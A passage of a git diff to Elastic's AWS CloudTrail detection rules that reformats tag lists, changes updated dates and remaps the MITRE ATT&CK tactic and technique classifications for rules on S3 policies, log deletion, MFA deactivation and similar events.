= "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -151,38 +151,28 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.006" name = "Databases" reference = "https://attack.mitre.org/techniques/T1213/006/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml index 508c391abc5..999b1b4a28f 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -116,7 +116,16 @@ references = [ risk_score = 47 rule_id = "e8c9ff14-fd1e-11ee-a0df-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -139,16 +148,29 @@ and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipie [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml index 326b18d51b8..6d7ba2052c1 100644 --- a/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml +++ b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -115,7 +115,16 @@ references = [ risk_score = 47 rule_id = "618bb351-00f0-467b-8956-8cace8b81f07" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -131,16 +140,29 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml index f744c959733..465364b2801 100644 --- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml +++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -64,7 +64,17 @@ references = [ risk_score = 21 rule_id = "3df49ff6-985d-11ef-88a1-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SNS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Collection", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "new_terms" @@ -78,16 +88,46 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" +[[rule.threat.technique.subtechnique]] +id = "T1496.004" +name = "Cloud Service Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/004/" + + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml index 1f89a48a949..4b6fbec2338 100644 --- a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml +++ b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Austin Songer", "Elastic"] @@ -100,7 +100,14 @@ references = [ risk_score = 21 rule_id = "87594192-4539-4bc4-8543-23bc3d5bd2b4" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EventBridge", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EventBridge", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -114,16 +121,17 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml index 6f372dd93a0..013d9381c79 100644 --- a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml +++ b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/01" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -80,7 +80,17 @@ references = [ risk_score = 21 rule_id = "5f0234fd-7f21-42af-8391-511d5fd11d5c" severity = "low" -tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Log Auditing"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Log Auditing", + "Tactic: Impact", + "Tactic: Discovery", + "Tactic: Collection", +] timestamp_override = "event.ingested" type = "threshold" @@ -101,7 +111,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1657" +name = "Financial Theft" +reference = "https://attack.mitre.org/techniques/T1657/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" @@ -111,6 +132,20 @@ reference = "https://attack.mitre.org/techniques/T1619/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + + [rule.threshold] field = ["tls.client.server_name", "source.address", "aws.cloudtrail.user_identity.type"] value = 1 diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml index 05d22d3c38f..f19cadad27f 100644 --- a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml +++ b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 21 rule_id = "3e002465-876f-4f04-b016-84ef48ce7e5d" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Cloudtrail", + "Use Case: Log Auditing", + "Resources: Investigation Guide", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "query" @@ -79,21 +87,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml index 461ca5fca01..1f6a8dd5d98 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/18" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -126,7 +126,16 @@ references = [ risk_score = 47 rule_id = "68a7a5a5-a2fc-4a76-ba9f-26849de881b4" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: Amazon CloudWatch", + "Use Case: Log Auditing", + "Resources: Investigation Guide", + "Tactic: Defense Evasion", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "query" @@ -142,21 +151,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml index 2579dfe7c4f..6312cf48c76 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -113,7 +113,16 @@ references = [ risk_score = 47 rule_id = "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: Amazon CloudWatch", + "Use Case: Log Auditing", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -129,21 +138,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml index 59ca5c226e9..0aa53f8fd0e 100644 --- a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml +++ b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -107,7 +107,14 @@ references = [ risk_score = 47 rule_id = "bb9b13b2-1700-48a8-a750-b43b0a72ab69" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -118,21 +125,22 @@ event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.acti [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml index 6bc872fe7e4..1221591ba53 100644 --- a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml +++ b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/02" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -116,16 +116,22 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml index 47d2cd2bd7c..2a685166ca7 100644 --- a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml +++ b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic", "Austin Songer"] @@ -93,7 +93,16 @@ references = [ risk_score = 47 rule_id = "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS IAM", + "Resources: Investigation Guide", + "Tactic: Impact", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -107,39 +116,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml index 3a697f610ce..d12ddb1dc74 100644 --- a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml +++ b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/28" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -101,7 +101,15 @@ references = [ risk_score = 47 rule_id = "f6652fb5-cd8e-499c-8311-2ce2bb6cac62" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "eql" @@ -116,16 +124,17 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_snapshot_deleted.toml b/rules/integrations/aws/impact_rds_snapshot_deleted.toml index dfd3f15f6b9..7e6e4313c9b 100644 --- a/rules/integrations/aws/impact_rds_snapshot_deleted.toml +++ b/rules/integrations/aws/impact_rds_snapshot_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -154,16 +154,17 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml index daebbd7abb6..36ccc844da3 100644 --- a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml +++ b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -148,18 +148,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index df37ae1e4e8..a8842b9754b 100644 --- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -95,7 +95,16 @@ references = ["https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.htm risk_score = 47 rule_id = "e2a67480-3b79-403d-96e3-fdd2992c50ef" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Privilege Escalation", +] timestamp_override = "event.ingested" type = "query" @@ -124,12 +133,10 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -139,3 +146,19 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/aws/initial_access_password_recovery.toml b/rules/integrations/aws/initial_access_password_recovery.toml index 2858c38caf0..32b17765f99 100644 --- a/rules/integrations/aws/initial_access_password_recovery.toml +++ b/rules/integrations/aws/initial_access_password_recovery.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/02" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -123,3 +123,16 @@ field_names = [ "aws.cloudtrail.response_elements" ] +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml index 889051ca438..7a3ec1d8500 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -67,7 +67,16 @@ references = [ 